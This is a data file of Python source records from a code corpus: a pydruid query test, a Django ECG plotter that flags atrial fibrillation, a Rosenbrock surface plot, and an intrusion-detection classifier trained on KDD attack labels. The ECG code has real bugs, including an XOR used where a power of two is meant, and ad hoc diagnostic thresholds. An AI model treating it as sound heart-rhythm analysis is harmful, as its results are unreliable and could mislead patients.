+{"seq_id": "168907501", "text": "import os\nimport pytest\nfrom pydruid.client import PyDruid\nfrom pydruid.utils.aggregators import doublesum\nfrom pydruid.utils.filters import Dimension\n\nclass TestCube:\n def test_cube_query(self):\n \tquery = PyDruid(\"http://pipeline.qiniu.com\", 'v2/stream/cubes/query')\n \tquery.set_qiniu(\"\", \"\")\n \ttop = query.topn(\n \t\t\tdatasource='domain_top_statics',\n \t\t\tgranularity='all',\n \t\t\tintervals='2019-08-13/pt1h', # utc time of 2014 oscars\n \t\t\taggregations={'count': doublesum('count')},\n \t\t\tmetric='count',\n \t\t\tdimension='Country',\n \t\t\tthreshold=10)\n \tdf = query.export_pandas()\n \tprint(df)\n \ttop.export_tsv('top.tsv')\n \n", "sub_path": "tests/test_qiniu.py", "file_name": "test_qiniu.py", "file_ext": "py", "file_size_in_byte": 665, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pydruid.client.PyDruid", "line_number": 9, "usage_type": "call"}, {"api_name": "pydruid.utils.aggregators.doublesum", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "653101139", "text": "# This script helps to plot ECG signals. \n\nimport pandas as pd\nfrom plotly import graph_objs\nfrom plotly import tools\nfrom plotly.offline import plot\nfrom django.conf import settings\n\nfrom scipy import signal\nfrom scipy.signal import find_peaks_cwt\nfrom numpy import polyfit\nimport numpy as np\nimport math\n\nfrom .detect_peaks import detect_peaks\n\ndef frange(x, y, jump):\n '''\n Crea una lista de numeros para la division\n de la senal por ploques de jump segundos\n '''\n while x < y:\n yield x\n x += jump\n\n\ndef signal_processing(file_name, divide_plots=False):\n\n print('***************************************************')\n print('---------------------------------------------------')\n\n ## ---------------- Datos de Eventos PLOTS ---------------\n tiempos_plots = []\n bpm_plots = []\n x_plots = []\n y_plots = []\n rrmean_values_plots = []\n rr_variability_plots = []\n rrmean_plots = []\n rr_variabilitysum_plots = []\n\n ## ---------------- Se adquiere la senal -----------------\n path = '/data/'\n df = pd.read_csv(settings.MEDIA_ROOT+path+file_name)\n\n try:\n x=df['X']\n y=df['Y']\n except:\n df = pd.read_csv(settings.MEDIA_ROOT+path+file_name, sep=';')\n\n x=df['X']\n y=df['Y']\n \n # Frecuencia de Muestro\n Fs = 300\n rateBPM = 60\n\n ## ---------- ACONDICIONAMIENTO DE LOS VALORES X ----------\n # Entre 1000, porque asi son dados los valores\n x = np.array(x)\n y = np.array(y)\n # Para empezar en el segundo 5\n try:\n x = x[1500:10000]\n y = y[1500:10000]\n except:\n pass\n x = (x/1000.0)-1 # Para empezar desde 0 segundos\n y = y/1000.0\n \n # Inicio de muestra (segundos)\n x_inicio1 = x[0]\n x_decimal = x_inicio1-math.floor(x_inicio1)\n x_inicio = (x_decimal * 0.999) / 0.299 + math.floor(x_inicio1) \n # Final de muestra (segundos)\n x_final1 = x[-1]\n x_decimal_fin = x_final1 - math.floor(x_final1)\n x_final = (x_decimal_fin * 0.999) / 0.299 + math.floor(x_final1) \n \n # TIEMPO Total de la SENAL\n tiempo_total = x_final - x_inicio\n\n # Formamos el axis x (segundos) (CON ESTO PROCESAMOS)\n t = np.linspace(x_inicio, x_final, y.size, endpoint=True)\n # El Y para PLOT (y_final)\n y_final = []\n\n ## -------------------- Datos ---------------------\n # BPM (Latidos por MINUTO (60 segundos))\n taquicardia = 100.0 # Mayor que\n bradicardia = 60.0 # Menor que\n # Separacion de PICOS (1 Hz - 1.667 Hz (2 Hz))\n taquicardia_seg = 60/taquicardia # Menor que 0.6 segundos\n bradicardia_seg = 60/bradicardia # Mayor que 1.0 segundos\n # En milisegundos\n taquicardia_mili = 600.0 # Menor que 600 milisegundos\n bradicardia_mili = 1000.0 # Mayor que 1000 milisegundos\n\n ## ------------- CONVERSION DE BITS --------------- \n num_bits = 12.0\n max_volt = 3.3\n y = (max_volt * y)/(2^int(num_bits))\n #--------------------------------------------------\n\n ## --------------- PROCESAMIENTO -----------------\n # Por encima de 10 segundos (tiempo total)\n segundos_bloque = 15.0\n sobra_bloque = tiempo_total/segundos_bloque\n bloques = list(frange(x_inicio, x_final, segundos_bloque))\n\n # contador de figuras\n cont_fig = 2\n\n # ultimo loop\n last_loop = False\n\n # Para R-R\n rr_values_all = []\n rr_values_all_plot = []\n rr_mean_values_all = []\n rrmean_values = []\n rr_mean_prom = 0\n rr_up_mean_values_all = []\n rr_down_mean_values_all = []\n RRv_all = []\n RRv_all_plot=[]\n rr_mean = 0\n RRv_suma_all = []\n\n # Para saber si plotear ultima parte\n ploteosiono = False\n\n y_peaks=[]\n t_peaks = []\n picos_todos = []\n \n ## Resultado\n values = {'FA': False, 'ARRITMIA': False, 'ARRITMIA_GENERAL': False}\n values['suficiente_tiempo'] = True\n\n # PROCESAMIENTO:\n if tiempo_total > segundos_bloque: # Por encima de 10 segundos (tiempo total)\n for i in bloques:\n # EVITAR bloque menor a 5 segundos\n ultimate_i = i + segundos_bloque # Proximo bloque\n if (ultimate_i < x_final) and ((x_final-ultimate_i) < (segundos_bloque/2)):\n\n # Datos de BLOQUE\n indice_mayores = (i <= t) \n t_bloque_parcial = t[indice_mayores] # Para t\n y_bloque_parcial = y[indice_mayores] # Para y\n indice_menores = (t_bloque_parcial <= x_final)\n t_bloque = t_bloque_parcial[indice_menores] # Para t\n y_bloque = y_bloque_parcial[indice_menores] # Para y\n \n\n last_loop = True\n else:\n # Datos de BLOQUE\n indice_mayores = (i <= t)\n t_bloque_parcial = t[indice_mayores] # Para t\n y_bloque_parcial = y[indice_mayores] # Para y\n indice_menores = (t_bloque_parcial <= (i + segundos_bloque))\n t_bloque = t_bloque_parcial[indice_menores] # Para t\n y_bloque = y_bloque_parcial[indice_menores] # Para y\n\n \n # Filtro SALVITZKY para reducir ruido (y_smooth)\n order_sgolay = 7\n framelen = 21\n # Asegurar que la cantidad de y_bloque es mayor que framelen\n if not(len(y_bloque) > framelen):\n order_sgolay = len(y_bloque)-2\n framelen = len(y_bloque)-1\n # Solo is es odd (impar) : order_sgolay < framelen\n if (framelen%2) != 1:\n order_sgolay = order_sgolay-1;\n framelen = framelen-1\n print('Se cambio el orden de Savitzky Golay\\n')\n \n y_smooth = signal.savgol_filter(y_bloque, framelen, order_sgolay)\n \n\n # DETREND (Quitar la tendecia de la senal) (y_detrend)\n p = polyfit((np.arange(len(y_smooth))),y_smooth,6)\n f_y = np.polyval(p,(np.arange(len(y_smooth))))\n y_detrend = y_smooth - f_y\n\n\n # MULTIPLICACION por si misma\n y_var = y_detrend * y_detrend\n y_var = y_var * 100 # 10 (valor a milivoltios)\n y_normal = y_var\n\n\n # DETECCION de PICOS\n y_max = max(y_normal)\n\n # umbral minimo del pico de la senal\n min_peak_value = y_max*0.4\n \n # umbral minimo de pico (TEORICO)\n min_peak_value_theory = 0.2\n # Los picos deben ser si o si mayores a 0.29\n if not(min_peak_value >= min_peak_value_theory):\n print('El pico minimio es menor a '+str(min_peak_value_theory))\n min_peak_value = min_peak_value_theory\n # Picos: valores\n index_peaks = detect_peaks(y_normal, mph=min_peak_value, mpd=0.3, show=True) # primer valor probado 0.150\n \n if index_peaks == []:\n break \n t_peaks = t_bloque[index_peaks] \n y_peaks = y_normal[index_peaks]\n\n #Colocar todos los picos:\n for peak in y_peaks:\n picos_todos.append(peak)\n \n # RR-VARIABILITY\n RRv_suma = 0\n RRv_variamucho = False\n minimo_variacion = 0.6 ##CAMBIAR? por el momento bien 0.6 1.5\n porcentaje_prematuridad = 0.78\n\n # RR - INTERVALOS\n rr_values = []\n rr_promedio = 0\n RRv_suma_porcentaje = []\n # RR-MEAN\n fuerade_rrmean = False\n\n # MINIMO 10 picos\n if (len(y_peaks)> 9):\n # RR - VARIABILITY\n for i2 in range(len(y_peaks)-2):\n # No deberia haber variacion (RRv = 0)\n RRv21 = (t_peaks[i2+1]-t_peaks[i2])\n RRv32 = (t_peaks[i2+2]-t_peaks[i2+1])\n RRv_suma = RRv_suma + abs(RRv32 - RRv21)\n RRv_suma_all.append(abs(RRv32 - RRv21)) #Plots\n\n # Porcentaje\n if (1-(abs(RRv21-RRv32)/(RRv21))):\n RRv_suma_porcentaje.append(abs(RRv32 - RRv21))\n\n if RRv_suma > minimo_variacion:\n RRv_variamucho = True\n \n\n # RR - INTERVALOS (segundos)\n for i3 in range(1,len(t_peaks)):\n # se guarda valor intervalo RR\n pulso_ant = t_peaks[i3-1]\n pulso_act = t_peaks[i3]\n rr_values.append(pulso_act - pulso_ant)\n \n # de RRv para plot!!\n RRv_hahas = [RRv_suma]*len(rr_values) ## REVISAR DESCOMENTAR\n #RRv_hahas = RRv_suma_sola*len(rr_values) \n for RRv_haha in RRv_hahas:\n RRv_all.append(RRv_haha)\n \n \n rr_suma = sum(rr_values)\n rr_promedio = sum(rr_values)/len(t_peaks)\n \n # Asignamos al rr_values total\n for rr_val in rr_values: ## REVISAR!!\n rr_values_all.append(rr_val)\n \n # MEAN R-R Interval (se toma rr_values anterior)\n rr_mean = 0\n for i4 in range(0,len(rr_values)):\n rr_mean = 0.75*rr_mean+0.25*rr_values[i4]\n rrmean_values = [rr_mean]*len(rr_values)\n # Asignamos al rr_mean valores totales\n for rrmean_value in rrmean_values:\n rr_mean_values_all.append(rrmean_value)\n\n # Valores R-R Limites\n up_rr_true = [] # Los valores mayores a \n up_mean_rrvalues = [i21 for i21 in rr_values if i21 >= (rr_mean*1.35)] #2.5+0.5##ESSTO QUEDA\n \n down_rr_true = [] # Los valores mayores a \n down_mean_rrvalues = [i22 for i22 in rr_values if i22 <= (rr_mean*0.85)] #0.1-0.5\n\n \n if (len(up_mean_rrvalues) + len(down_mean_rrvalues)) > 1:\n fuerade_rrmean = True\n elif up_mean_rrvalues or down_mean_rrvalues:\n fuerade_rrmean = True\n\n\n # BEATS PER MIMUNTE\n rateBPM = len(y_peaks)*60.0/(t_bloque[-1]-t_bloque[0])\n #print('BPM: '+ str(rateBPM))\n\n # ---------------- FIBRILACION AURICULAR ----------------\n if (fuerade_rrmean==True) and (RRv_variamucho==True):\n values['FA'] = True\n tiempos_plots.append([t_bloque[0],t_bloque[-1]])\n x_plots.append(t_bloque)\n y_plots.append(y_smooth)\n rrmean_values_plots.append(rrmean_values)\n rr_variability_plots.append(rr_values)\n rr_variabilitysum_plots.append(RRv_suma_all)\n rrmean_plots.append(rr_mean)\n bpm_plots.append(rateBPM)\n values['ARRITMIA_GENERAL'] = True\n elif (fuerade_rrmean==True):\n values['ARRITMIA_GENERAL'] = True\n else:\n values['FA'] = False\n values['ARRITMIA'] = False\n\n # Para conteo de figuras\n cont_fig = cont_fig+1\n \n # Para formar el Y FINAL\n for y_i in y_detrend:\n y_final.append(y_i)\n\n # LOOP ULTIMO\n if last_loop:\n break\n \n\n else:\n values['suficiente_tiempo'] = False\n print('No se adquirio suficiente tiempo')\n\n\n values['rr_mean'] = rr_mean\n values['up_rr_mean'] = rr_mean*1.15\n values['down_rr_mean'] = rr_mean*0.85\n\n values['rateBPM'] = rateBPM\n values['cycles_num'] = len(picos_todos)\n values['cycles'] = []\n cycles = []\n values['tiempos_plots'] = tiempos_plots\n\n for i in range(0,len(y_peaks)-1):\n cycles.append('Intervalo R-R #'+str(i+1)+' - #'+str(i+2) +': '+str(rateBPM))\n \n values['cycles'] = cycles\n\n #--------------------------------------------------\n\n trace1 = graph_objs.Scatter(\n x=t, y=y_final, \n mode='lines', name='signal'\n )\n\n layout = graph_objs.Layout(title='ECG ('+file_name+')',\n plot_bgcolor='rgb(230, 230,230)')\n \n\n ## ----------------- R-R MEAN Interval Plot --------------\n x_values_mean = range(0, len(rr_values_all))\n \n ups_mean = []\n for rr_up_mean in rr_mean_values_all:\n ups_mean.append(rr_up_mean*1.35) #2.5+0.5\n x_values_mean1 = range(0, len(ups_mean))\n\n downs_mean = []\n for down_up_mean in rr_mean_values_all:\n downs_mean.append(down_up_mean*0.85) #0.1-0.5\n x_values_mean2 = range(0, len(downs_mean))\n \n \n trace2 = graph_objs.Scatter(\n x=x_values_mean,\n y=rr_values_all,\n mode='markers',\n name='Intervalos MEAN R-R'\n )\n trace3 = graph_objs.Scatter(\n x=x_values_mean1,\n y=ups_mean,\n name='Limite MEAN R-R'\n )\n \n trace4 = graph_objs.Scatter(\n x=x_values_mean2,\n y=downs_mean,\n name='Limite MEAN R-R'\n )\n # -----------------------------------------------------\n\n # ----------------R-R Interval Plot--------------------\n x_values = range(0, len(rr_values_all))\n x_RRv_suma_all = range(0, len(RRv_suma_all))\n #rr_values_prom = sum(rr_values_all)/len(rr_values_all)\n \n rr_up = [1.1]*len(x_values)#[15]*len(x_values)\n rr_down = [0]*len(x_values)#[0]*len(x_values)\n\n trace5 = graph_objs.Scatter(\n x=x_values,\n y=RRv_suma_all,#RRv_all,\n mode='markers',\n name='Intervalos R-R'\n )\n trace6 = graph_objs.Scatter(\n x=[0, len(x_values)],\n y=rr_up,#[sum(RRv_all)/len(RRv_all)*1.15, sum(RRv_all)/len(RRv_all)*1.15],#y=rr_up_mean_values_all,\n name='Limite R-R'\n )\n trace7 = graph_objs.Scatter(\n x=[0, len(x_values)],\n y=rr_down,#[sum(RRv_all)/len(RRv_all)*0.85, sum(RRv_all)/len(RRv_all)*0.85],#y=[rr_mean_prom*0.85, rr_mean_prom*0.85],\n name='Limite R-R'\n )\n \n data = [trace1, trace2, trace3, trace4, trace5]\n fig = tools.make_subplots(rows=3, cols=1, subplot_titles=('ECG', 'R-R Variabilidad'))\n fig.append_trace(trace1, 1, 1)\n fig.append_trace(trace2, 2, 1)\n fig.append_trace(trace3, 2, 1)\n fig.append_trace(trace4, 2, 1)\n fig.append_trace(trace5, 3, 1)\n fig.append_trace(trace6, 3, 1)\n fig.append_trace(trace7, 3, 1)\n fig['layout']['xaxis1'].update(title='Segundos', range=[5, 15])\n fig['layout']['yaxis1'].update(title='Milivoltios')\n fig['layout']['plot_bgcolor']='rgb(230, 230,230)'\n fig['layout']['xaxis2'].update(title='Bloques')#, range=[0, len(x_values)] )\n fig['layout']['yaxis2'].update(title='R-R Intervalos')\n fig['layout']['xaxis3'].update(title='Bloques')#, range=[0, len(x_values)+5])\n \n plot_div = plot(fig, output_type='div', include_plotlyjs=False)\n\n # Si no se requiere plots, enviar 2 variables\n if divide_plots==False:\n return plot_div, values\n\n # --------------- Plots de Eventos -----------------\n event_plots = [] #Plots de eventos\n plot_cont = 0\n \n if len(tiempos_plots) > 0:\n for tiempos_plot in tiempos_plots:\n event_trace = graph_objs.Scatter(\n x=x_plots[plot_cont],\n y=y_plots[plot_cont],\n mode='lines',\n name = 'Evento Arritmico'\n )\n\n x_rr_plots = range(0, len(rr_variability_plots))\n event_trace2 = graph_objs.Scatter(\n x=x_rr_plots[plot_cont],\n y=rr_variability_plots[plot_cont],\n mode='markers',\n name='Variabilidad R-R'\n )\n\n rrmean_up_plots = []\n rrmean_up_plots.append(rrmean_plots[plot_cont]*1.35)\n rrmean_up_plots = rrmean_up_plots*len(rr_variability_plots[plot_cont])\n \n event_trace3 = graph_objs.Scatter(\n x=[0, len(rrmean_up_plots)],\n y=rrmean_up_plots,\n name='Limite MEAN R-R'\n )\n rrmean_down_plots = []\n rrmean_down_plots.append(rrmean_plots[plot_cont]*0.85)\n rrmean_down_plots = rrmean_down_plots*len(rr_variability_plots[plot_cont])\n \n event_trace4 = graph_objs.Scatter(\n x=[0, len(rrmean_down_plots)],\n y=rrmean_down_plots,\n name='Limite MEAN R-R'\n )\n\n #---------------------------------------------------------\n x_rrv_plots = range(0, len(rr_variabilitysum_plots[plot_cont]))\n rr_up_plots = [0.8]*len(x_rrv_plots)\n event_trace5 = graph_objs.Scatter(\n x=x_rrv_plots[plot_cont],\n y=rr_variabilitysum_plots[plot_cont],\n mode='markers',\n name='Suma de Variabilidad R-R'\n )\n event_trace6 = graph_objs.Scatter(\n x=[0, len(rr_up_plots)],\n y=rr_up_plots,#[sum(RRv_all)/len(RRv_all)*1.15, sum(RRv_all)/len(RRv_all)*1.15],#y=rr_up_mean_values_all,\n name='Limite R-R (propio)'\n )\n\n subplot_titles = ('Evento: del segundo '+ str(int(tiempos_plot[0]))+' - al segundo '+str(int(tiempos_plot[1])), \n 'R-R Variabilidad')\n event_fig = tools.make_subplots(rows=3, cols=1, subplot_titles=subplot_titles)\n event_fig.append_trace(event_trace, 1, 1)\n event_fig.append_trace(event_trace2, 2, 1)\n event_fig.append_trace(event_trace3, 2, 1)\n event_fig.append_trace(event_trace4, 2, 1)\n event_fig.append_trace(event_trace5, 3, 1)\n event_fig.append_trace(event_trace6, 3, 1)\n event_fig['layout']['xaxis1'].update(title='Segundos')\n event_plot = plot(event_fig, output_type='div', include_plotlyjs=False)\n event_plots.append(event_plot)\n plot_cont += 1\n # --------------------------------------------------\n return plot_div, values, event_plots", "sub_path": "apps/information/utils/ecg_plotter.py", "file_name": "ecg_plotter.py", "file_ext": "py", "file_size_in_byte": 18743, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.read_csv", "line_number": 44, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 44, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 44, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 50, "usage_type": "call"}, {"api_name": "django.conf.settings.MEDIA_ROOT", "line_number": 50, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 50, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 74, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 75, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 78, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 85, "usage_type": "call"}, {"api_name": "scipy.signal.savgol_filter", "line_number": 182, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 182, "usage_type": "name"}, {"api_name": "numpy.polyfit", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.polyval", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 187, "usage_type": "call"}, {"api_name": "detect_peaks.detect_peaks", "line_number": 210, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 352, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 352, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 357, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 357, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 375, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 375, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 381, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 381, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 387, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 387, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 402, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 402, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 408, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 408, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 413, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 413, "usage_type": "name"}, {"api_name": "plotly.tools.make_subplots", "line_number": 420, "usage_type": "call"}, {"api_name": "plotly.tools", "line_number": 420, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 435, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 447, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 447, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 455, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 455, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 466, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 466, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 475, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 475, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 484, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 484, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 490, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 490, "usage_type": "name"}, {"api_name": "plotly.tools.make_subplots", "line_number": 498, "usage_type": "call"}, {"api_name": "plotly.tools", "line_number": 498, "usage_type": "name"}, {"api_name": "plotly.offline.plot", "line_number": 506, "usage_type": "call"}]}
+{"seq_id": "390541034", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 30 15:17:43 2017\n\n@author: Mike\n\"\"\"\n\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport matplotlib.pyplot as plt\ndef first(x, y):\n return (100 *(y-x**2)**2 + (1-x)**2)\nx = arange(-6.0,5.0,0.1)\ny = arange(-6.0,5.0,0.1)\nX,Y = meshgrid(x, y) \nZ = first(X, Y)\n'''\nim = imshow(Z,cmap=cm.RdBu) # drawing the function\n# adding the Contour lines with labels\ncset = contour(Z,arange(-1,1.5,0.2),linewidths=2,cmap=cm.Set2)\nplt([1],[1])\nclabel(cset,inline=True,fmt='%1.1f',fontsize=10)\ncolorbar(im) # adding the colobar on the right\n# latex fashion title\ntitle('$z=(1-x^2+y^3) e^{-(x^2+y^2)/2}$')\nshow()\n'''\nfig = plt.figure()\nax = fig.gca(projection='3d')\nsurf = ax.plot_surface(X, Y, Z, rstride=1, cstride=1, \n cmap=cm.RdBu,linewidth=0, antialiased=False)\nax.plot([1],[1],'go')\nax.zaxis.set_major_locator(LinearLocator(10))\nax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\nfig.colorbar(surf, shrink=.5, aspect=5)\nplt.show()", "sub_path": "Numerical Optimization Problems/first.py", "file_name": "first.py", "file_ext": "py", "file_size_in_byte": 1037, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.ticker.LinearLocator", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.ticker.FormatStrFormatter", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}]}
+{"seq_id": "132179668", "text": "from sklearn.datasets import fetch_openml\nimport pandas as pd\nimport numpy as np\nimport pickle\n\ndata = '''back dos\nbuffer_overflow u2r\nftp_write r2l\nguess_passwd r2l\nimap r2l\nipsweep probe\nland dos\nloadmodule u2r\nmultihop r2l\nneptune dos\nnmap probe\nperl u2r\nphf r2l\npod dos\nportsweep probe\nrootkit u2r\nsatan probe\nsmurf dos\nspy r2l\nteardrop dos\nwarezclient r2l\nwarezmaster r2l'''\n\n# grouped by type\nattack_types = pd.DataFrame([row.split() for row in data.split('\\n')], columns=['name','type'])\nattack_type_groups = attack_types.groupby('type')['name'].unique()\n\nprint('attack group types: {}'.format(', '.join(attack_type_groups.index)))\nprint()\nprint(attack_type_groups)\n\n#X = features\n#y = label (target)\nfrom sklearn.datasets import fetch_openml\nX, y = fetch_openml(data_id='1113', return_X_y=True, as_frame=True)\nprint('n records: {}'.format(len(X.index)))\nX_preserved = X.copy()\ny_preserved = y.copy()\n\ndef get_attack_type_downsampled_balanced_subset(attack_names, label, X, y):\n print('Attack group name: {}'.format(label))\n print('Attack_types: {}'.format(', '.join(attack_names)))\n \n is_type_attack = y.isin(attack_names)\n \n only_attack_type = y[is_type_attack]\n only_not_attack_type = y[~is_type_attack]\n \n only_attack_type = is_type_attack[is_type_attack]\n only_not_attack_type = is_type_attack[~is_type_attack]\n \n \n num_attack_type = only_attack_type.shape[0]\n num_not_attack_type = only_not_attack_type.shape[0]\n \n print('Num attack type: {}'.format(num_attack_type))\n print('Num not attack type: {}'.format(num_not_attack_type))\n \n\n # Take a balanced sample\n # which one has less? that is the one we should downsample\n lowest_count = min(num_attack_type, num_not_attack_type)\n \n balanced_ys = []\n balanced_Xs = []\n for subset_y in [only_attack_type, only_not_attack_type]:\n _subset_y = subset_y.copy()\n if _subset_y.shape[0] > lowest_count:\n _subset_y = subset_y.sample(n=lowest_count)\n subset_X = X.loc[_subset_y.index, :]\n balanced_Xs.append(subset_X)\n balanced_ys.append(_subset_y)\n \n assert len(balanced_Xs) == len(balanced_ys)\n \n for i, balanced_y in enumerate(balanced_ys):\n assert balanced_y.shape[0] == lowest_count\n assert balanced_Xs[i].shape[0] == lowest_count\n \n X_new = pd.concat(balanced_Xs)\n y_new = pd.concat(balanced_ys).rename(label)\n \n print(X_new.shape[0])\n print(y_new.shape[0])\n print()\n \n return X_new, y_new\n\nX_is_dos, y_is_dos = get_attack_type_downsampled_balanced_subset(attack_type_groups['dos'], 'is_dos_attack', X, y)\nX_is_probe, y_is_probe = get_attack_type_downsampled_balanced_subset(attack_type_groups['probe'], 'is_probe_attack', X, y)\nX_is_r2l, y_is_r2l = get_attack_type_downsampled_balanced_subset(attack_type_groups['r2l'], 'is_r2l_attack', X, y)\nX_is_u2r, y_is_u2r = get_attack_type_downsampled_balanced_subset(attack_type_groups['u2r'], 'is_u2r_attack', X, y)\n\nX, y = X_is_probe, y_is_probe\n\nfrom sklearn.compose import ColumnTransformer\nfrom sklearn.datasets import fetch_openml\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.preprocessing import StandardScaler, OneHotEncoder\nfrom sklearn.linear_model import LogisticRegression, RidgeClassifier\nfrom sklearn.model_selection import train_test_split, GridSearchCV\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import classification_report, confusion_matrix\n\n\nnp.random.seed(0)\n\n#column transformer\n\nnumeric_features = ['src_bytes','dst_bytes']\nnumeric_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='median')),\n ('scaler', StandardScaler())])\n\ncategorical_features = ['protocol_type']\n#categorical_features = []\ncategorical_transformer = Pipeline(steps=[\n ('imputer', SimpleImputer(strategy='constant', fill_value='missing')),\n ('onehot', OneHotEncoder(handle_unknown='ignore'))])\n\npreprocessor = ColumnTransformer(\n transformers=[\n ('num', numeric_transformer, numeric_features),\n ('cat', categorical_transformer, categorical_features)])\n\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import plot_precision_recall_curve\nfrom sklearn.metrics import average_precision_score\nfrom sklearn.metrics import log_loss\nfrom sklearn.metrics import roc_auc_score, roc_curve, auc\nimport matplotlib.pyplot as plt\n\nclassifiers = [\n LogisticRegression()\n]\n\nclf = Pipeline(steps=[('preprocessor', preprocessor),\n ('clf', None)])\n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X,y, test_size=0.2, random_state=0)\n\nprint('Training Features Shape:', X_train.shape)\nprint('Training Labels Shape:', y_train.shape)\nprint('Testing Features Shape:', X_test.shape)\nprint('Testing Labels Shape:', y_test.shape)\n\nroc_things = []\nprecision_recall_things = []\n\nfor classifier in classifiers:\n clf.set_params(clf=classifier).fit(X_train, y_train)\n classifier_name = classifier.__class__.__name__\n print(str(classifier))\n print(\"model score: %.3f\" % clf.score(X_test, y_test))\n\n y_score = clf.predict_proba(X_test)[:,1]\n\n y_pred = clf.predict(X_test)\n \n roc_auc = roc_auc_score(y_test, y_score)\n fpr, tpr, _ = roc_curve(y_test, y_score)\n roc_things.append((fpr, tpr, '{} AUC: {:.3f}'.format(classifier_name, roc_auc)))\n \n precision, recall, thresholds = precision_recall_curve(y_test, y_score)\n pr_auc = auc(recall, precision)\n precision_recall_things.append((recall, precision, thresholds, '{} AUC: {:.3f}'.format(classifier_name, pr_auc)))\n #plot_precision_recall_curve(clf, X_test, y_test)\n \n print(confusion_matrix(y_test, y_pred))\n print(classification_report(y_test, y_pred))\n\n print('average precision score: {:.3f}'.format(average_precision_score(y_test, y_score)))\n print('roc_auc_score: {:.3f}'.format(roc_auc))\n print('precision-recall AUC: {:.3f}'.format(pr_auc))\n print()\n\nroc_plt = plt.figure()\nlw = 4\nfor roc_thing in roc_things:\n fpr, tpr, label = roc_thing\n plt.plot(fpr, tpr, lw=lw, label=label)\nplt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\nplt.legend()\nplt.title('ROC curve')\n\npr_plt = plt.figure()\nfor pr_thing in precision_recall_things:\n recall, precision, _, label = pr_thing\n plt.plot(recall, precision, lw=lw, label=label)\nratio = y_test[y_test].shape[0] / y_test.shape[0]\nplt.hlines(y=ratio, xmin=0, xmax=1, color='navy', lw=lw, linestyle='--')\nplt.title('Precision-recall plot')\nplt.legend()\n\nwith open('{}.pkl'.format(classifier_name), 'wb') as f:\n pickle.dump(clf, f)", "sub_path": "model.py", 